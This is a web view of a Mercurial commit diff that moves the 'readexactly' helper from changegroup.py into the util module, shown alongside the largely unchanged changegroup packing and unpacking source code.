##// END OF EJS Templates
util: move 'readexactly' in the util module...
Boris Feld -
r35772:fb0be099 default
parent child Browse files
Show More
@@ -1,1003 +1,996 b''
1 # changegroup.py - Mercurial changegroup manipulation functions
1 # changegroup.py - Mercurial changegroup manipulation functions
2 #
2 #
3 # Copyright 2006 Matt Mackall <mpm@selenic.com>
3 # Copyright 2006 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import os
10 import os
11 import struct
11 import struct
12 import tempfile
12 import tempfile
13 import weakref
13 import weakref
14
14
15 from .i18n import _
15 from .i18n import _
16 from .node import (
16 from .node import (
17 hex,
17 hex,
18 nullrev,
18 nullrev,
19 short,
19 short,
20 )
20 )
21
21
22 from . import (
22 from . import (
23 dagutil,
23 dagutil,
24 error,
24 error,
25 mdiff,
25 mdiff,
26 phases,
26 phases,
27 pycompat,
27 pycompat,
28 util,
28 util,
29 )
29 )
30
30
31 _CHANGEGROUPV1_DELTA_HEADER = "20s20s20s20s"
31 _CHANGEGROUPV1_DELTA_HEADER = "20s20s20s20s"
32 _CHANGEGROUPV2_DELTA_HEADER = "20s20s20s20s20s"
32 _CHANGEGROUPV2_DELTA_HEADER = "20s20s20s20s20s"
33 _CHANGEGROUPV3_DELTA_HEADER = ">20s20s20s20s20sH"
33 _CHANGEGROUPV3_DELTA_HEADER = ">20s20s20s20s20sH"
34
34
35 def readexactly(stream, n):
35 readexactly = util.readexactly
36 '''read n bytes from stream.read and abort if less was available'''
37 s = stream.read(n)
38 if len(s) < n:
39 raise error.Abort(_("stream ended unexpectedly"
40 " (got %d bytes, expected %d)")
41 % (len(s), n))
42 return s
43
36
44 def getchunk(stream):
37 def getchunk(stream):
45 """return the next chunk from stream as a string"""
38 """return the next chunk from stream as a string"""
46 d = readexactly(stream, 4)
39 d = readexactly(stream, 4)
47 l = struct.unpack(">l", d)[0]
40 l = struct.unpack(">l", d)[0]
48 if l <= 4:
41 if l <= 4:
49 if l:
42 if l:
50 raise error.Abort(_("invalid chunk length %d") % l)
43 raise error.Abort(_("invalid chunk length %d") % l)
51 return ""
44 return ""
52 return readexactly(stream, l - 4)
45 return readexactly(stream, l - 4)
53
46
54 def chunkheader(length):
47 def chunkheader(length):
55 """return a changegroup chunk header (string)"""
48 """return a changegroup chunk header (string)"""
56 return struct.pack(">l", length + 4)
49 return struct.pack(">l", length + 4)
57
50
58 def closechunk():
51 def closechunk():
59 """return a changegroup chunk header (string) for a zero-length chunk"""
52 """return a changegroup chunk header (string) for a zero-length chunk"""
60 return struct.pack(">l", 0)
53 return struct.pack(">l", 0)
61
54
62 def writechunks(ui, chunks, filename, vfs=None):
55 def writechunks(ui, chunks, filename, vfs=None):
63 """Write chunks to a file and return its filename.
56 """Write chunks to a file and return its filename.
64
57
65 The stream is assumed to be a bundle file.
58 The stream is assumed to be a bundle file.
66 Existing files will not be overwritten.
59 Existing files will not be overwritten.
67 If no filename is specified, a temporary file is created.
60 If no filename is specified, a temporary file is created.
68 """
61 """
69 fh = None
62 fh = None
70 cleanup = None
63 cleanup = None
71 try:
64 try:
72 if filename:
65 if filename:
73 if vfs:
66 if vfs:
74 fh = vfs.open(filename, "wb")
67 fh = vfs.open(filename, "wb")
75 else:
68 else:
76 # Increase default buffer size because default is usually
69 # Increase default buffer size because default is usually
77 # small (4k is common on Linux).
70 # small (4k is common on Linux).
78 fh = open(filename, "wb", 131072)
71 fh = open(filename, "wb", 131072)
79 else:
72 else:
80 fd, filename = tempfile.mkstemp(prefix="hg-bundle-", suffix=".hg")
73 fd, filename = tempfile.mkstemp(prefix="hg-bundle-", suffix=".hg")
81 fh = os.fdopen(fd, pycompat.sysstr("wb"))
74 fh = os.fdopen(fd, pycompat.sysstr("wb"))
82 cleanup = filename
75 cleanup = filename
83 for c in chunks:
76 for c in chunks:
84 fh.write(c)
77 fh.write(c)
85 cleanup = None
78 cleanup = None
86 return filename
79 return filename
87 finally:
80 finally:
88 if fh is not None:
81 if fh is not None:
89 fh.close()
82 fh.close()
90 if cleanup is not None:
83 if cleanup is not None:
91 if filename and vfs:
84 if filename and vfs:
92 vfs.unlink(cleanup)
85 vfs.unlink(cleanup)
93 else:
86 else:
94 os.unlink(cleanup)
87 os.unlink(cleanup)
95
88
96 class cg1unpacker(object):
89 class cg1unpacker(object):
97 """Unpacker for cg1 changegroup streams.
90 """Unpacker for cg1 changegroup streams.
98
91
99 A changegroup unpacker handles the framing of the revision data in
92 A changegroup unpacker handles the framing of the revision data in
100 the wire format. Most consumers will want to use the apply()
93 the wire format. Most consumers will want to use the apply()
101 method to add the changes from the changegroup to a repository.
94 method to add the changes from the changegroup to a repository.
102
95
103 If you're forwarding a changegroup unmodified to another consumer,
96 If you're forwarding a changegroup unmodified to another consumer,
104 use getchunks(), which returns an iterator of changegroup
97 use getchunks(), which returns an iterator of changegroup
105 chunks. This is mostly useful for cases where you need to know the
98 chunks. This is mostly useful for cases where you need to know the
106 data stream has ended by observing the end of the changegroup.
99 data stream has ended by observing the end of the changegroup.
107
100
108 deltachunk() is useful only if you're applying delta data. Most
101 deltachunk() is useful only if you're applying delta data. Most
109 consumers should prefer apply() instead.
102 consumers should prefer apply() instead.
110
103
111 A few other public methods exist. Those are used only for
104 A few other public methods exist. Those are used only for
112 bundlerepo and some debug commands - their use is discouraged.
105 bundlerepo and some debug commands - their use is discouraged.
113 """
106 """
114 deltaheader = _CHANGEGROUPV1_DELTA_HEADER
107 deltaheader = _CHANGEGROUPV1_DELTA_HEADER
115 deltaheadersize = struct.calcsize(deltaheader)
108 deltaheadersize = struct.calcsize(deltaheader)
116 version = '01'
109 version = '01'
117 _grouplistcount = 1 # One list of files after the manifests
110 _grouplistcount = 1 # One list of files after the manifests
118
111
119 def __init__(self, fh, alg, extras=None):
112 def __init__(self, fh, alg, extras=None):
120 if alg is None:
113 if alg is None:
121 alg = 'UN'
114 alg = 'UN'
122 if alg not in util.compengines.supportedbundletypes:
115 if alg not in util.compengines.supportedbundletypes:
123 raise error.Abort(_('unknown stream compression type: %s')
116 raise error.Abort(_('unknown stream compression type: %s')
124 % alg)
117 % alg)
125 if alg == 'BZ':
118 if alg == 'BZ':
126 alg = '_truncatedBZ'
119 alg = '_truncatedBZ'
127
120
128 compengine = util.compengines.forbundletype(alg)
121 compengine = util.compengines.forbundletype(alg)
129 self._stream = compengine.decompressorreader(fh)
122 self._stream = compengine.decompressorreader(fh)
130 self._type = alg
123 self._type = alg
131 self.extras = extras or {}
124 self.extras = extras or {}
132 self.callback = None
125 self.callback = None
133
126
134 # These methods (compressed, read, seek, tell) all appear to only
127 # These methods (compressed, read, seek, tell) all appear to only
135 # be used by bundlerepo, but it's a little hard to tell.
128 # be used by bundlerepo, but it's a little hard to tell.
136 def compressed(self):
129 def compressed(self):
137 return self._type is not None and self._type != 'UN'
130 return self._type is not None and self._type != 'UN'
138 def read(self, l):
131 def read(self, l):
139 return self._stream.read(l)
132 return self._stream.read(l)
140 def seek(self, pos):
133 def seek(self, pos):
141 return self._stream.seek(pos)
134 return self._stream.seek(pos)
142 def tell(self):
135 def tell(self):
143 return self._stream.tell()
136 return self._stream.tell()
144 def close(self):
137 def close(self):
145 return self._stream.close()
138 return self._stream.close()
146
139
147 def _chunklength(self):
140 def _chunklength(self):
148 d = readexactly(self._stream, 4)
141 d = readexactly(self._stream, 4)
149 l = struct.unpack(">l", d)[0]
142 l = struct.unpack(">l", d)[0]
150 if l <= 4:
143 if l <= 4:
151 if l:
144 if l:
152 raise error.Abort(_("invalid chunk length %d") % l)
145 raise error.Abort(_("invalid chunk length %d") % l)
153 return 0
146 return 0
154 if self.callback:
147 if self.callback:
155 self.callback()
148 self.callback()
156 return l - 4
149 return l - 4
157
150
158 def changelogheader(self):
151 def changelogheader(self):
159 """v10 does not have a changelog header chunk"""
152 """v10 does not have a changelog header chunk"""
160 return {}
153 return {}
161
154
162 def manifestheader(self):
155 def manifestheader(self):
163 """v10 does not have a manifest header chunk"""
156 """v10 does not have a manifest header chunk"""
164 return {}
157 return {}
165
158
166 def filelogheader(self):
159 def filelogheader(self):
167 """return the header of the filelogs chunk, v10 only has the filename"""
160 """return the header of the filelogs chunk, v10 only has the filename"""
168 l = self._chunklength()
161 l = self._chunklength()
169 if not l:
162 if not l:
170 return {}
163 return {}
171 fname = readexactly(self._stream, l)
164 fname = readexactly(self._stream, l)
172 return {'filename': fname}
165 return {'filename': fname}
173
166
174 def _deltaheader(self, headertuple, prevnode):
167 def _deltaheader(self, headertuple, prevnode):
175 node, p1, p2, cs = headertuple
168 node, p1, p2, cs = headertuple
176 if prevnode is None:
169 if prevnode is None:
177 deltabase = p1
170 deltabase = p1
178 else:
171 else:
179 deltabase = prevnode
172 deltabase = prevnode
180 flags = 0
173 flags = 0
181 return node, p1, p2, deltabase, cs, flags
174 return node, p1, p2, deltabase, cs, flags
182
175
183 def deltachunk(self, prevnode):
176 def deltachunk(self, prevnode):
184 l = self._chunklength()
177 l = self._chunklength()
185 if not l:
178 if not l:
186 return {}
179 return {}
187 headerdata = readexactly(self._stream, self.deltaheadersize)
180 headerdata = readexactly(self._stream, self.deltaheadersize)
188 header = struct.unpack(self.deltaheader, headerdata)
181 header = struct.unpack(self.deltaheader, headerdata)
189 delta = readexactly(self._stream, l - self.deltaheadersize)
182 delta = readexactly(self._stream, l - self.deltaheadersize)
190 node, p1, p2, deltabase, cs, flags = self._deltaheader(header, prevnode)
183 node, p1, p2, deltabase, cs, flags = self._deltaheader(header, prevnode)
191 return (node, p1, p2, cs, deltabase, delta, flags)
184 return (node, p1, p2, cs, deltabase, delta, flags)
192
185
193 def getchunks(self):
186 def getchunks(self):
194 """returns all the chunks contains in the bundle
187 """returns all the chunks contains in the bundle
195
188
196 Used when you need to forward the binary stream to a file or another
189 Used when you need to forward the binary stream to a file or another
197 network API. To do so, it parse the changegroup data, otherwise it will
190 network API. To do so, it parse the changegroup data, otherwise it will
198 block in case of sshrepo because it don't know the end of the stream.
191 block in case of sshrepo because it don't know the end of the stream.
199 """
192 """
200 # For changegroup 1 and 2, we expect 3 parts: changelog, manifestlog,
193 # For changegroup 1 and 2, we expect 3 parts: changelog, manifestlog,
201 # and a list of filelogs. For changegroup 3, we expect 4 parts:
194 # and a list of filelogs. For changegroup 3, we expect 4 parts:
202 # changelog, manifestlog, a list of tree manifestlogs, and a list of
195 # changelog, manifestlog, a list of tree manifestlogs, and a list of
203 # filelogs.
196 # filelogs.
204 #
197 #
205 # Changelog and manifestlog parts are terminated with empty chunks. The
198 # Changelog and manifestlog parts are terminated with empty chunks. The
206 # tree and file parts are a list of entry sections. Each entry section
199 # tree and file parts are a list of entry sections. Each entry section
207 # is a series of chunks terminating in an empty chunk. The list of these
200 # is a series of chunks terminating in an empty chunk. The list of these
208 # entry sections is terminated in yet another empty chunk, so we know
201 # entry sections is terminated in yet another empty chunk, so we know
209 # we've reached the end of the tree/file list when we reach an empty
202 # we've reached the end of the tree/file list when we reach an empty
210 # chunk that was proceeded by no non-empty chunks.
203 # chunk that was proceeded by no non-empty chunks.
211
204
212 parts = 0
205 parts = 0
213 while parts < 2 + self._grouplistcount:
206 while parts < 2 + self._grouplistcount:
214 noentries = True
207 noentries = True
215 while True:
208 while True:
216 chunk = getchunk(self)
209 chunk = getchunk(self)
217 if not chunk:
210 if not chunk:
218 # The first two empty chunks represent the end of the
211 # The first two empty chunks represent the end of the
219 # changelog and the manifestlog portions. The remaining
212 # changelog and the manifestlog portions. The remaining
220 # empty chunks represent either A) the end of individual
213 # empty chunks represent either A) the end of individual
221 # tree or file entries in the file list, or B) the end of
214 # tree or file entries in the file list, or B) the end of
222 # the entire list. It's the end of the entire list if there
215 # the entire list. It's the end of the entire list if there
223 # were no entries (i.e. noentries is True).
216 # were no entries (i.e. noentries is True).
224 if parts < 2:
217 if parts < 2:
225 parts += 1
218 parts += 1
226 elif noentries:
219 elif noentries:
227 parts += 1
220 parts += 1
228 break
221 break
229 noentries = False
222 noentries = False
230 yield chunkheader(len(chunk))
223 yield chunkheader(len(chunk))
231 pos = 0
224 pos = 0
232 while pos < len(chunk):
225 while pos < len(chunk):
233 next = pos + 2**20
226 next = pos + 2**20
234 yield chunk[pos:next]
227 yield chunk[pos:next]
235 pos = next
228 pos = next
236 yield closechunk()
229 yield closechunk()
237
230
238 def _unpackmanifests(self, repo, revmap, trp, prog, numchanges):
231 def _unpackmanifests(self, repo, revmap, trp, prog, numchanges):
239 # We know that we'll never have more manifests than we had
232 # We know that we'll never have more manifests than we had
240 # changesets.
233 # changesets.
241 self.callback = prog(_('manifests'), numchanges)
234 self.callback = prog(_('manifests'), numchanges)
242 # no need to check for empty manifest group here:
235 # no need to check for empty manifest group here:
243 # if the result of the merge of 1 and 2 is the same in 3 and 4,
236 # if the result of the merge of 1 and 2 is the same in 3 and 4,
244 # no new manifest will be created and the manifest group will
237 # no new manifest will be created and the manifest group will
245 # be empty during the pull
238 # be empty during the pull
246 self.manifestheader()
239 self.manifestheader()
247 deltas = self.deltaiter()
240 deltas = self.deltaiter()
248 repo.manifestlog._revlog.addgroup(deltas, revmap, trp)
241 repo.manifestlog._revlog.addgroup(deltas, revmap, trp)
249 repo.ui.progress(_('manifests'), None)
242 repo.ui.progress(_('manifests'), None)
250 self.callback = None
243 self.callback = None
251
244
252 def apply(self, repo, tr, srctype, url, targetphase=phases.draft,
245 def apply(self, repo, tr, srctype, url, targetphase=phases.draft,
253 expectedtotal=None):
246 expectedtotal=None):
254 """Add the changegroup returned by source.read() to this repo.
247 """Add the changegroup returned by source.read() to this repo.
255 srctype is a string like 'push', 'pull', or 'unbundle'. url is
248 srctype is a string like 'push', 'pull', or 'unbundle'. url is
256 the URL of the repo where this changegroup is coming from.
249 the URL of the repo where this changegroup is coming from.
257
250
258 Return an integer summarizing the change to this repo:
251 Return an integer summarizing the change to this repo:
259 - nothing changed or no source: 0
252 - nothing changed or no source: 0
260 - more heads than before: 1+added heads (2..n)
253 - more heads than before: 1+added heads (2..n)
261 - fewer heads than before: -1-removed heads (-2..-n)
254 - fewer heads than before: -1-removed heads (-2..-n)
262 - number of heads stays the same: 1
255 - number of heads stays the same: 1
263 """
256 """
264 repo = repo.unfiltered()
257 repo = repo.unfiltered()
265 def csmap(x):
258 def csmap(x):
266 repo.ui.debug("add changeset %s\n" % short(x))
259 repo.ui.debug("add changeset %s\n" % short(x))
267 return len(cl)
260 return len(cl)
268
261
269 def revmap(x):
262 def revmap(x):
270 return cl.rev(x)
263 return cl.rev(x)
271
264
272 changesets = files = revisions = 0
265 changesets = files = revisions = 0
273
266
274 try:
267 try:
275 # The transaction may already carry source information. In this
268 # The transaction may already carry source information. In this
276 # case we use the top level data. We overwrite the argument
269 # case we use the top level data. We overwrite the argument
277 # because we need to use the top level value (if they exist)
270 # because we need to use the top level value (if they exist)
278 # in this function.
271 # in this function.
279 srctype = tr.hookargs.setdefault('source', srctype)
272 srctype = tr.hookargs.setdefault('source', srctype)
280 url = tr.hookargs.setdefault('url', url)
273 url = tr.hookargs.setdefault('url', url)
281 repo.hook('prechangegroup',
274 repo.hook('prechangegroup',
282 throw=True, **pycompat.strkwargs(tr.hookargs))
275 throw=True, **pycompat.strkwargs(tr.hookargs))
283
276
284 # write changelog data to temp files so concurrent readers
277 # write changelog data to temp files so concurrent readers
285 # will not see an inconsistent view
278 # will not see an inconsistent view
286 cl = repo.changelog
279 cl = repo.changelog
287 cl.delayupdate(tr)
280 cl.delayupdate(tr)
288 oldheads = set(cl.heads())
281 oldheads = set(cl.heads())
289
282
290 trp = weakref.proxy(tr)
283 trp = weakref.proxy(tr)
291 # pull off the changeset group
284 # pull off the changeset group
292 repo.ui.status(_("adding changesets\n"))
285 repo.ui.status(_("adding changesets\n"))
293 clstart = len(cl)
286 clstart = len(cl)
294 class prog(object):
287 class prog(object):
295 def __init__(self, step, total):
288 def __init__(self, step, total):
296 self._step = step
289 self._step = step
297 self._total = total
290 self._total = total
298 self._count = 1
291 self._count = 1
299 def __call__(self):
292 def __call__(self):
300 repo.ui.progress(self._step, self._count, unit=_('chunks'),
293 repo.ui.progress(self._step, self._count, unit=_('chunks'),
301 total=self._total)
294 total=self._total)
302 self._count += 1
295 self._count += 1
303 self.callback = prog(_('changesets'), expectedtotal)
296 self.callback = prog(_('changesets'), expectedtotal)
304
297
305 efiles = set()
298 efiles = set()
306 def onchangelog(cl, node):
299 def onchangelog(cl, node):
307 efiles.update(cl.readfiles(node))
300 efiles.update(cl.readfiles(node))
308
301
309 self.changelogheader()
302 self.changelogheader()
310 deltas = self.deltaiter()
303 deltas = self.deltaiter()
311 cgnodes = cl.addgroup(deltas, csmap, trp, addrevisioncb=onchangelog)
304 cgnodes = cl.addgroup(deltas, csmap, trp, addrevisioncb=onchangelog)
312 efiles = len(efiles)
305 efiles = len(efiles)
313
306
314 if not cgnodes:
307 if not cgnodes:
315 repo.ui.develwarn('applied empty changegroup',
308 repo.ui.develwarn('applied empty changegroup',
316 config='warn-empty-changegroup')
309 config='warn-empty-changegroup')
317 clend = len(cl)
310 clend = len(cl)
318 changesets = clend - clstart
311 changesets = clend - clstart
319 repo.ui.progress(_('changesets'), None)
312 repo.ui.progress(_('changesets'), None)
320 self.callback = None
313 self.callback = None
321
314
322 # pull off the manifest group
315 # pull off the manifest group
323 repo.ui.status(_("adding manifests\n"))
316 repo.ui.status(_("adding manifests\n"))
324 self._unpackmanifests(repo, revmap, trp, prog, changesets)
317 self._unpackmanifests(repo, revmap, trp, prog, changesets)
325
318
326 needfiles = {}
319 needfiles = {}
327 if repo.ui.configbool('server', 'validate'):
320 if repo.ui.configbool('server', 'validate'):
328 cl = repo.changelog
321 cl = repo.changelog
329 ml = repo.manifestlog
322 ml = repo.manifestlog
330 # validate incoming csets have their manifests
323 # validate incoming csets have their manifests
331 for cset in xrange(clstart, clend):
324 for cset in xrange(clstart, clend):
332 mfnode = cl.changelogrevision(cset).manifest
325 mfnode = cl.changelogrevision(cset).manifest
333 mfest = ml[mfnode].readdelta()
326 mfest = ml[mfnode].readdelta()
334 # store file cgnodes we must see
327 # store file cgnodes we must see
335 for f, n in mfest.iteritems():
328 for f, n in mfest.iteritems():
336 needfiles.setdefault(f, set()).add(n)
329 needfiles.setdefault(f, set()).add(n)
337
330
338 # process the files
331 # process the files
339 repo.ui.status(_("adding file changes\n"))
332 repo.ui.status(_("adding file changes\n"))
340 newrevs, newfiles = _addchangegroupfiles(
333 newrevs, newfiles = _addchangegroupfiles(
341 repo, self, revmap, trp, efiles, needfiles)
334 repo, self, revmap, trp, efiles, needfiles)
342 revisions += newrevs
335 revisions += newrevs
343 files += newfiles
336 files += newfiles
344
337
345 deltaheads = 0
338 deltaheads = 0
346 if oldheads:
339 if oldheads:
347 heads = cl.heads()
340 heads = cl.heads()
348 deltaheads = len(heads) - len(oldheads)
341 deltaheads = len(heads) - len(oldheads)
349 for h in heads:
342 for h in heads:
350 if h not in oldheads and repo[h].closesbranch():
343 if h not in oldheads and repo[h].closesbranch():
351 deltaheads -= 1
344 deltaheads -= 1
352 htext = ""
345 htext = ""
353 if deltaheads:
346 if deltaheads:
354 htext = _(" (%+d heads)") % deltaheads
347 htext = _(" (%+d heads)") % deltaheads
355
348
356 repo.ui.status(_("added %d changesets"
349 repo.ui.status(_("added %d changesets"
357 " with %d changes to %d files%s\n")
350 " with %d changes to %d files%s\n")
358 % (changesets, revisions, files, htext))
351 % (changesets, revisions, files, htext))
359 repo.invalidatevolatilesets()
352 repo.invalidatevolatilesets()
360
353
361 if changesets > 0:
354 if changesets > 0:
362 if 'node' not in tr.hookargs:
355 if 'node' not in tr.hookargs:
363 tr.hookargs['node'] = hex(cl.node(clstart))
356 tr.hookargs['node'] = hex(cl.node(clstart))
364 tr.hookargs['node_last'] = hex(cl.node(clend - 1))
357 tr.hookargs['node_last'] = hex(cl.node(clend - 1))
365 hookargs = dict(tr.hookargs)
358 hookargs = dict(tr.hookargs)
366 else:
359 else:
367 hookargs = dict(tr.hookargs)
360 hookargs = dict(tr.hookargs)
368 hookargs['node'] = hex(cl.node(clstart))
361 hookargs['node'] = hex(cl.node(clstart))
369 hookargs['node_last'] = hex(cl.node(clend - 1))
362 hookargs['node_last'] = hex(cl.node(clend - 1))
370 repo.hook('pretxnchangegroup',
363 repo.hook('pretxnchangegroup',
371 throw=True, **pycompat.strkwargs(hookargs))
364 throw=True, **pycompat.strkwargs(hookargs))
372
365
373 added = [cl.node(r) for r in xrange(clstart, clend)]
366 added = [cl.node(r) for r in xrange(clstart, clend)]
374 phaseall = None
367 phaseall = None
375 if srctype in ('push', 'serve'):
368 if srctype in ('push', 'serve'):
376 # Old servers can not push the boundary themselves.
369 # Old servers can not push the boundary themselves.
377 # New servers won't push the boundary if changeset already
370 # New servers won't push the boundary if changeset already
378 # exists locally as secret
371 # exists locally as secret
379 #
372 #
380 # We should not use added here but the list of all change in
373 # We should not use added here but the list of all change in
381 # the bundle
374 # the bundle
382 if repo.publishing():
375 if repo.publishing():
383 targetphase = phaseall = phases.public
376 targetphase = phaseall = phases.public
384 else:
377 else:
385 # closer target phase computation
378 # closer target phase computation
386
379
387 # Those changesets have been pushed from the
380 # Those changesets have been pushed from the
388 # outside, their phases are going to be pushed
381 # outside, their phases are going to be pushed
389 # alongside. Therefor `targetphase` is
382 # alongside. Therefor `targetphase` is
390 # ignored.
383 # ignored.
391 targetphase = phaseall = phases.draft
384 targetphase = phaseall = phases.draft
392 if added:
385 if added:
393 phases.registernew(repo, tr, targetphase, added)
386 phases.registernew(repo, tr, targetphase, added)
394 if phaseall is not None:
387 if phaseall is not None:
395 phases.advanceboundary(repo, tr, phaseall, cgnodes)
388 phases.advanceboundary(repo, tr, phaseall, cgnodes)
396
389
397 if changesets > 0:
390 if changesets > 0:
398
391
399 def runhooks():
392 def runhooks():
400 # These hooks run when the lock releases, not when the
393 # These hooks run when the lock releases, not when the
401 # transaction closes. So it's possible for the changelog
394 # transaction closes. So it's possible for the changelog
402 # to have changed since we last saw it.
395 # to have changed since we last saw it.
403 if clstart >= len(repo):
396 if clstart >= len(repo):
404 return
397 return
405
398
406 repo.hook("changegroup", **pycompat.strkwargs(hookargs))
399 repo.hook("changegroup", **pycompat.strkwargs(hookargs))
407
400
408 for n in added:
401 for n in added:
409 args = hookargs.copy()
402 args = hookargs.copy()
410 args['node'] = hex(n)
403 args['node'] = hex(n)
411 del args['node_last']
404 del args['node_last']
412 repo.hook("incoming", **pycompat.strkwargs(args))
405 repo.hook("incoming", **pycompat.strkwargs(args))
413
406
414 newheads = [h for h in repo.heads()
407 newheads = [h for h in repo.heads()
415 if h not in oldheads]
408 if h not in oldheads]
416 repo.ui.log("incoming",
409 repo.ui.log("incoming",
417 "%s incoming changes - new heads: %s\n",
410 "%s incoming changes - new heads: %s\n",
418 len(added),
411 len(added),
419 ', '.join([hex(c[:6]) for c in newheads]))
412 ', '.join([hex(c[:6]) for c in newheads]))
420
413
421 tr.addpostclose('changegroup-runhooks-%020i' % clstart,
414 tr.addpostclose('changegroup-runhooks-%020i' % clstart,
422 lambda tr: repo._afterlock(runhooks))
415 lambda tr: repo._afterlock(runhooks))
423 finally:
416 finally:
424 repo.ui.flush()
417 repo.ui.flush()
425 # never return 0 here:
418 # never return 0 here:
426 if deltaheads < 0:
419 if deltaheads < 0:
427 ret = deltaheads - 1
420 ret = deltaheads - 1
428 else:
421 else:
429 ret = deltaheads + 1
422 ret = deltaheads + 1
430 return ret
423 return ret
431
424
432 def deltaiter(self):
425 def deltaiter(self):
433 """
426 """
434 returns an iterator of the deltas in this changegroup
427 returns an iterator of the deltas in this changegroup
435
428
436 Useful for passing to the underlying storage system to be stored.
429 Useful for passing to the underlying storage system to be stored.
437 """
430 """
438 chain = None
431 chain = None
439 for chunkdata in iter(lambda: self.deltachunk(chain), {}):
432 for chunkdata in iter(lambda: self.deltachunk(chain), {}):
440 # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags)
433 # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags)
441 yield chunkdata
434 yield chunkdata
442 chain = chunkdata[0]
435 chain = chunkdata[0]
443
436
444 class cg2unpacker(cg1unpacker):
437 class cg2unpacker(cg1unpacker):
445 """Unpacker for cg2 streams.
438 """Unpacker for cg2 streams.
446
439
447 cg2 streams add support for generaldelta, so the delta header
440 cg2 streams add support for generaldelta, so the delta header
448 format is slightly different. All other features about the data
441 format is slightly different. All other features about the data
449 remain the same.
442 remain the same.
450 """
443 """
451 deltaheader = _CHANGEGROUPV2_DELTA_HEADER
444 deltaheader = _CHANGEGROUPV2_DELTA_HEADER
452 deltaheadersize = struct.calcsize(deltaheader)
445 deltaheadersize = struct.calcsize(deltaheader)
453 version = '02'
446 version = '02'
454
447
455 def _deltaheader(self, headertuple, prevnode):
448 def _deltaheader(self, headertuple, prevnode):
456 node, p1, p2, deltabase, cs = headertuple
449 node, p1, p2, deltabase, cs = headertuple
457 flags = 0
450 flags = 0
458 return node, p1, p2, deltabase, cs, flags
451 return node, p1, p2, deltabase, cs, flags
459
452
460 class cg3unpacker(cg2unpacker):
453 class cg3unpacker(cg2unpacker):
461 """Unpacker for cg3 streams.
454 """Unpacker for cg3 streams.
462
455
463 cg3 streams add support for exchanging treemanifests and revlog
456 cg3 streams add support for exchanging treemanifests and revlog
464 flags. It adds the revlog flags to the delta header and an empty chunk
457 flags. It adds the revlog flags to the delta header and an empty chunk
465 separating manifests and files.
458 separating manifests and files.
466 """
459 """
467 deltaheader = _CHANGEGROUPV3_DELTA_HEADER
460 deltaheader = _CHANGEGROUPV3_DELTA_HEADER
468 deltaheadersize = struct.calcsize(deltaheader)
461 deltaheadersize = struct.calcsize(deltaheader)
469 version = '03'
462 version = '03'
470 _grouplistcount = 2 # One list of manifests and one list of files
463 _grouplistcount = 2 # One list of manifests and one list of files
471
464
472 def _deltaheader(self, headertuple, prevnode):
465 def _deltaheader(self, headertuple, prevnode):
473 node, p1, p2, deltabase, cs, flags = headertuple
466 node, p1, p2, deltabase, cs, flags = headertuple
474 return node, p1, p2, deltabase, cs, flags
467 return node, p1, p2, deltabase, cs, flags
475
468
476 def _unpackmanifests(self, repo, revmap, trp, prog, numchanges):
469 def _unpackmanifests(self, repo, revmap, trp, prog, numchanges):
477 super(cg3unpacker, self)._unpackmanifests(repo, revmap, trp, prog,
470 super(cg3unpacker, self)._unpackmanifests(repo, revmap, trp, prog,
478 numchanges)
471 numchanges)
479 for chunkdata in iter(self.filelogheader, {}):
472 for chunkdata in iter(self.filelogheader, {}):
480 # If we get here, there are directory manifests in the changegroup
473 # If we get here, there are directory manifests in the changegroup
481 d = chunkdata["filename"]
474 d = chunkdata["filename"]
482 repo.ui.debug("adding %s revisions\n" % d)
475 repo.ui.debug("adding %s revisions\n" % d)
483 dirlog = repo.manifestlog._revlog.dirlog(d)
476 dirlog = repo.manifestlog._revlog.dirlog(d)
484 deltas = self.deltaiter()
477 deltas = self.deltaiter()
485 if not dirlog.addgroup(deltas, revmap, trp):
478 if not dirlog.addgroup(deltas, revmap, trp):
486 raise error.Abort(_("received dir revlog group is empty"))
479 raise error.Abort(_("received dir revlog group is empty"))
487
480
488 class headerlessfixup(object):
481 class headerlessfixup(object):
489 def __init__(self, fh, h):
482 def __init__(self, fh, h):
490 self._h = h
483 self._h = h
491 self._fh = fh
484 self._fh = fh
492 def read(self, n):
485 def read(self, n):
493 if self._h:
486 if self._h:
494 d, self._h = self._h[:n], self._h[n:]
487 d, self._h = self._h[:n], self._h[n:]
495 if len(d) < n:
488 if len(d) < n:
496 d += readexactly(self._fh, n - len(d))
489 d += readexactly(self._fh, n - len(d))
497 return d
490 return d
498 return readexactly(self._fh, n)
491 return readexactly(self._fh, n)
499
492
500 class cg1packer(object):
493 class cg1packer(object):
501 deltaheader = _CHANGEGROUPV1_DELTA_HEADER
494 deltaheader = _CHANGEGROUPV1_DELTA_HEADER
502 version = '01'
495 version = '01'
503 def __init__(self, repo, bundlecaps=None):
496 def __init__(self, repo, bundlecaps=None):
504 """Given a source repo, construct a bundler.
497 """Given a source repo, construct a bundler.
505
498
506 bundlecaps is optional and can be used to specify the set of
499 bundlecaps is optional and can be used to specify the set of
507 capabilities which can be used to build the bundle. While bundlecaps is
500 capabilities which can be used to build the bundle. While bundlecaps is
508 unused in core Mercurial, extensions rely on this feature to communicate
501 unused in core Mercurial, extensions rely on this feature to communicate
509 capabilities to customize the changegroup packer.
502 capabilities to customize the changegroup packer.
510 """
503 """
511 # Set of capabilities we can use to build the bundle.
504 # Set of capabilities we can use to build the bundle.
512 if bundlecaps is None:
505 if bundlecaps is None:
513 bundlecaps = set()
506 bundlecaps = set()
514 self._bundlecaps = bundlecaps
507 self._bundlecaps = bundlecaps
515 # experimental config: bundle.reorder
508 # experimental config: bundle.reorder
516 reorder = repo.ui.config('bundle', 'reorder')
509 reorder = repo.ui.config('bundle', 'reorder')
517 if reorder == 'auto':
510 if reorder == 'auto':
518 reorder = None
511 reorder = None
519 else:
512 else:
520 reorder = util.parsebool(reorder)
513 reorder = util.parsebool(reorder)
521 self._repo = repo
514 self._repo = repo
522 self._reorder = reorder
515 self._reorder = reorder
523 self._progress = repo.ui.progress
516 self._progress = repo.ui.progress
524 if self._repo.ui.verbose and not self._repo.ui.debugflag:
517 if self._repo.ui.verbose and not self._repo.ui.debugflag:
525 self._verbosenote = self._repo.ui.note
518 self._verbosenote = self._repo.ui.note
526 else:
519 else:
527 self._verbosenote = lambda s: None
520 self._verbosenote = lambda s: None
528
521
529 def close(self):
522 def close(self):
